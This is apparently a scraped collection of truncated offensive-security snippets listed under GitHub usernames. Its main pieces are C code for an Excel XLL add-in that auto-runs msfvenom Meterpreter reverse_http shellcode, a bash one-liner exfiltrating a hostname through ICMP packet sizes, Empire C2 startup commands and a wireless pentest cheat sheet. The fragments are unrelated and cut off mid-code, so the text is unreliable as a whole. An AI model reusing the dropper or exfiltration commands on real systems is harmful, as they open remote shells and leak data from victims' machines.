curi0usJack

	# 
	# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
	#
	# Note this version requires Apache 2.4+
	#
	# Save this file into something like /etc/apache2/redirect.rules.
	# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
	# 
	# Include /etc/apache2/redirect.rules
	#

Arno0x

// Compile with: cl.exe x86_meterpreter_reverse_http.c /LD /o x86_meterpreter_reverse_http.xll
#include <Windows.h>

__declspec(dllexport) void __cdecl xlAutoOpen(void); 

DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
	// Payload obtained via "msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f c"
	unsigned char b[] = 
	"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"

jobertabma

1. Capture ICMP packets on your server:

tcpdump -nni eth0 -e icmp[icmptype] == 8 -w output.cap

2. Send ICMP packets to your server with each byte stored in the packet size, execute this on the remote machine:

ip=vm03;output=`hostname`;for ((i=0;i<${#output};i++));do; ping -c 1 -s `printf '%d\n' "'${output:$i:1}'"` $ip;done

PaulSec

import subprocess
import argparse
import re
import sys
import requests

def do_dig(domain):
    command = "dig {} | grep IN".format(domain)
    try:
        output = subprocess.check_output(command, shell=True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT)

dogrocker

#Wireless Penetration Testing Cheat Sheet

##WIRELESS ANTENNA

• Open the Monitor Mode

root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up

1N3

#!/bin/sh
#
#      `7MN.   `7MF'       
# __,    MMN.    M         
#`7MM    M YMb   M  pd""b. 
#  MM    M  `MN. M (O)  `8b
#  MM    M   `MM.M      ,89
#  MM    M     YMM    ""Yb.
#.JMML..JML.    YM       88
#                  (O)  .M'

HarmJ0y

# start empire headless with the specified API username and password
./empire --headless --username empireadmin --password 'Password123!'

# login and the current server token
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/admin/login -X POST -d '{"username":"empireadmin", "password":"Password123!"}'

# store the token in a variable
TOKEN=<API_token>

# see listener options

staaldraad

# Mana-toolkit from @sensepost
#
# VERSION 0.1

FROM ubuntu

MAINTAINER Etienne Stalmans, [email protected]

RUN apt-get update && apt-get install -y \
 unzip \

Arr0way

##########################################################################################################
#                         |                                                                              #
#                  .      |  Super Awesome Bash History Logger for OSX V1.0                              #
#   .. ............;;.    |                                                                              #
#    ..:: @Arr0way ;;;;.  |  Disclaimer: Use at your own risk.                                           #
#  . . ::::::::::::;;:'   |                                                                              #
#                  :'     |  Enjoy.                                                                      #
#                         |                                                                              #
#                                                                                                        #
# Save your console commands and your sanity.                

Pallinder

alias   gdbnew='/usr/local/Cellar/gdb/7.6/bin/gdb'